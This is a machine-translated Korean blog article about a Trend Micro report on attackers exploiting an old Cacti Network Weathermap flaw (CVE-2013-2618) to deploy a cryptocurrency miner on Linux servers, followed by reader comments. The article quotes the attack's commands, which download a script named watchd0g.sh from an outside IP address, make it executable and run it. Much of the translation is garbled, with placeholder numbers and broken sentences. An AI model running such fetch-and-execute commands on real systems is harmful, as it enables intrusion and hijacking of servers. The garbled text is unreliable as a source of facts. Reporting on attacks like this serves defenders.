5 년 Linux 결함으로 공격자가 암호 화폐 채굴 가능

리눅스 충돌

이것은 암호 화폐 채굴 자 원격 컴퓨터를 사용하여 허가없이 이들의 소유자의 추세가되고 있습니다. 나는 이미 이런 종류의 상황에 대해 블로그에서 몇 차례 언급했습니다.

그리고 이것은 cryptocurrencies가 암호화 된 순간부터 이미 완전히 통제 할 수 없게 된 것입니다. 상당한 자리와 가치를 차지했습니다., 보안을 위반하는 컴퓨터에 액세스 할 수있는 충분한 지식을 가진 사람들은 금전적 이익을 얻기 위해 중요한 정보 나 은행 계좌를 찾는 데 시간을 낭비했습니다.

이를 수행하는 대신 그들은 이러한 팀을 제어하고 채굴 네트워크에서 통합하는 가장 간단한 방법과 봇넷으로 일반적으로 수행하는 다른 작업을 선택합니다.

이런 식으로 일반적으로 번호를 다시 매기는 것이 더 많습니다. 그들은 이것이 생성하는 즉각적인 돈에만 초점을 맞추고 있습니다.

시장 동향에 대한 현명한 이해와 암호화 거래에 대한 적절한 지식을 통해 큰 이점을 얻을 수 있습니다.

Linux는 정말 안전한 시스템입니까?

우리 중 많은 사람들이 Linux가 거의 완벽한 보안 운영 체제라는 생각을 가지고 있지만 현실은 여전히 ​​몇 가지 결함이 있습니다.

잘있다어떤 날 TrendMicro는,에서 Reveló 새로운 해커에게 암호 화폐 채굴의 이점을 제공 한 Linux 시스템의 결함 Linux 서버 및 컴퓨터 사용.

블로그를 통한 성명서 그들은 다음과 같이 논평했다:

사고 대응과 관련된 모니터링을 통해 JenkinsMiner 악성 코드를 사용한 이전 암호 화폐 마이닝 캠페인과 연관시킬 수있는 지표의 침입 시도를 관찰했습니다.

차이점 :이 캠페인은 Linux 서버를 대상으로합니다. 또한 거의 XNUMX 년 동안 패치를 사용할 수있는 오래된 보안 결함을 악용하기 때문에 재사용 된 취약점의 전형적인 사례입니다.

이 릴리스에서는 분석을 통해 영향을받은 사이트를 확인했습니다. 이 실패에 대해 주로 일본, 대만, 중국, 미국 및 인도에 영향을 미칩니다.

공격 분석

분석을 통해 Trend Micro 스마트 보호 네트워크 제공 공격자가이 결함을 이용하는 방법에 대해 자세히 설명합니다.

이 캠페인의 운영자는 시스템 관리자가 네트워크 활동을 시각화하는 데 사용하는 Camapi Network Weathermap 플러그인의 오래된 취약점 인 CVE-2013-2618을 악용했습니다.

그들이 오래된 보안 결함을 악용하는 이유 : Network Weathermap에는 2014 년 XNUMX 월부터 현재까지 공개적으로보고 된 취약점이 XNUMX 개뿐입니다.

이러한 공격자는 악용이 가능한 보안 결함뿐만 아니라 오픈 소스 도구를 사용하는 조직에서 발생하는 패치 지연을 이용할 수 있습니다.

기본적으로 XSS 공격을 통한 공격 :

기상도-크립토마이너-4

퍼지 부분은 포트가있는 웹 서버 인 공격 대상입니다.

파일 /plugins/weathermap/configs/conn.php 지속적인 XSS 공격으로 인한 파일입니다. / 플러그인 / weathermap / php .

플러스 conn.php 처음에는 '라는 페이지에 적용된 유사한 HTTP 요청을 볼 수 있습니다. 쿨.php '.

취약점을 통해 암호 화폐 채굴 프로그램이 배포됩니다. Linux 서버 인 대상의 PHP 날씨지도에서

이미지에서 공격이 어떻게 생성되는지 볼 수 있으며 다음과 같이 설명됩니다.

wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh

이것이하는 일은 거의 모든 Linux 배포판이 기본적으로 설치하는 유틸리티 인 wget으로 파일을 다운로드하라는 표시를 보내는 것입니다.

chmod 775 watchd0g.sh

파일을 실행 가능하게 만듭니다.

./watchd0g.sh

궁극적으로하는 일은 서버에서 파일을 실행하는 것입니다.

다행히도, 이미 패치가 있습니다 ( CVE-2013-2618 ) 실패 가능 다운로드 할 수 있습니다. 부터 이 링크.

Si 당신은 그것에 대해 더 알고 싶어 이 실패에 대해이 링크를 방문 할 수 있습니다.

출처 : PHP Weathermap 취약점을 통해 배포 된 Cryptocurrency Miner, Linux 서버 대상


기사의 내용은 우리의 원칙을 준수합니다. 편집 윤리. 오류를보고하려면 여기에.

5 코멘트, 당신의 것을 남겨주세요

코멘트를 남겨주세요

귀하의 이메일 주소는 공개되지 않습니다. 필수 필드가 표시되어 있습니다 *

*

*

  1. 데이터 책임자 : Miguel Ángel Gatón
  2. 데이터의 목적 : 스팸 제어, 댓글 관리.
  3. 합법성 : 귀하의 동의
  4. 데이터 전달 : 법적 의무에 의한 경우를 제외하고 데이터는 제 XNUMX 자에게 전달되지 않습니다.
  5. 데이터 저장소 : Occentus Networks (EU)에서 호스팅하는 데이터베이스
  6. 권리 : 귀하는 언제든지 귀하의 정보를 제한, 복구 및 삭제할 수 있습니다.

  1.   미구엘 마욜 이 투르

    바보가되는 것은 안전하지 않습니다. 그럼에도 불구하고 Linux는 당신을 구합니다.
    보안 패치를 업데이트하지 않는 것은 Linux의 잘못이 아닙니다. 일부 회사는 돈을 절약하고 바보를 시스템 관리자로 고용하고
    그러나 그럼에도 불구하고 즉시 감지되어 즉시 해결되며 이와 같은 사소한 보안 사고도 게시됩니다.

  2.   나는 eldekoletas 같은 빌라를 원한다

    그리고 Linux에는 업데이트가 적용되지 않은 데 어떤 결함이 있습니까? GNU / Linux 개발자는 새로운 취약성에 대한 솔루션을 개발하고이를 사용자에게 제공함으로써 임무를 수행합니다. 의사가 독감 백신을 처방했는데 맞지 않으면 병이 나고 뻣뻣 해집니다… 의사의 잘못입니까?

  3.   길레

    Linux는 원래의 모습이 아니기 때문에 두 가지 주요 결함이있는 두 가지 뉴스가 연속으로 나타납니다.
    1.- 개발하기에 더 나은 편집자들에게 그들은 자유 소프트웨어가 아닌 것을 놓고 그들은 다른 것을 잊어 버립니다 (그들은 주석에 인용되어 있습니다).
    2.- 업데이트되지 않은 서버에만 영향을 미치는 바이러스에 대한 엄청난 뉴스. 그러나 Linux가 기본적으로 수십 년 동안 업데이트 된 경우. Windows 스타일의 빠는 바이러스 백신이 필요한 것처럼 두려워합니다. 그들은 Linux가 Windows가 아니라 Windows와 같다고 말하는 것 같습니다.
    버그가 오래되고 이미 패치 된 경우 뉴스도 아니고 아무것도 아닙니다. Microsoft 및 Trend Micro, Norton, Panda 또는 McAffee와 같은 바이러스 백신 회사를 플레이하거나 돈을받지 마십시오.
    그건 그렇고, 우리는 회사에서 몇 년 동안 Trend Micro를 사용하고 있었는데 그것은 실제 감자였습니다. 사용을 허용하지 않고 제거 (디렉토리로 이동하여 실행되지 않음) 한 이유와 사용하는 데 필요한 안전한 실행 파일로이 동작을 차단 해제 할 화이트리스트가 없었습니다. . 엉망진창이야. 기업용 버전이었고 개별 버전은 이러한 화이트리스트 가능성이있었습니다. 서투른.

  4.   길레

    자신을 너무 우아하게 묘사하지 마십시오.
    이 기사에서는 프로그램에 들어가서 실행 가능하게 만들고 실행할 수있는 보안 허점에 대해 설명합니다. 이는 모든 바이러스가 확산되어야하는 보안 허점입니다. 네트워크에서 컴퓨터를 스캔하여 작업 및 자체 복사를 반복 할 수 있습니다. Linux에서 발견 된 보안 허점은 보안 패치로 덮여 있기 때문에 이러한 작업을 수행하지 못하는 것입니다. 즉, 바이러스 백신이 필요하지 않고 허점을 덮기 위해 Windows와 Linux의 차이점을 의미합니다. Windows에서는 다음과 같은 몇 가지 이유로 인해 더 어렵습니다. 1.- 파일이 단순히 확장명으로 실행 가능 해져 영향을받는 컴퓨터에 파일을 도입하는 단계를 제거 할 수 있습니다. 2.- 사용자는 독점적이며 비용을 지불하지 않고 있어야하기 때문에 출처가 의심스러운 프로그램을 계속 설치하고 있습니다 (가정 경제가 MS Office, Photoshop 등을 구입하는 것이 무엇인지를 말하지 않습니다. 컴퓨터 장비 비용). 3.- 조만간 Windows가 플러시되고 사용자는 시간을 낭비하지 않기 위해 모든 것을 포맷하고 업데이트되지 않은 정품 인증 패치로 Windows Ultimate를 설치하는 이웃, 친구에게 가져갑니다. 패치 자체에는 스파이 프로그램이 있습니다. 그렇지 않을 수도 있고 훌륭 할 수도 있지만 Windows가 암호를 감시하고있을 수도 있습니다. 기사에서 그들은 취약점의 영향을받는 리눅스의 도입 시스템에 대해 언급하고 있습니다. 네트워크를 자동으로 스캔하고이를 사용하여 스스로 복사하고 서버에서 실행하는 프로그램이 모든 것의 가장 쉬운 부분이되게합니다. 이 기사는 모든 바이러스에 대한 가장 중요한 단계입니다. 공격 할 시스템의 취약성을 아는 것입니다.

  5.   Hambaglio

    잘못된 정보입니다. 이것은 Linux의 버그가 아니라 PHP 응용 프로그램의 버그입니다. 즉, 교차 플랫폼입니다. Linux 커널을 실행하는 시스템에만 국한되지 않습니다! 그러나 응용 프로그램이 크로스 플랫폼이 아니더라도 Linux 버그가 아니라 단순히 응용 프로그램 일 것입니다.

    Linux 커널은 이와 같은 교차 사이트 스크립팅 공격으로부터 보호하는 데 약간의 간섭이 없습니다. 뭔가에 대해 조금 아는 사람에게는 당신이 나빠 보일 것이라는 진실이 있기 때문에 적어도 게시하기 전에 XNUMX 분을 조사하십시오.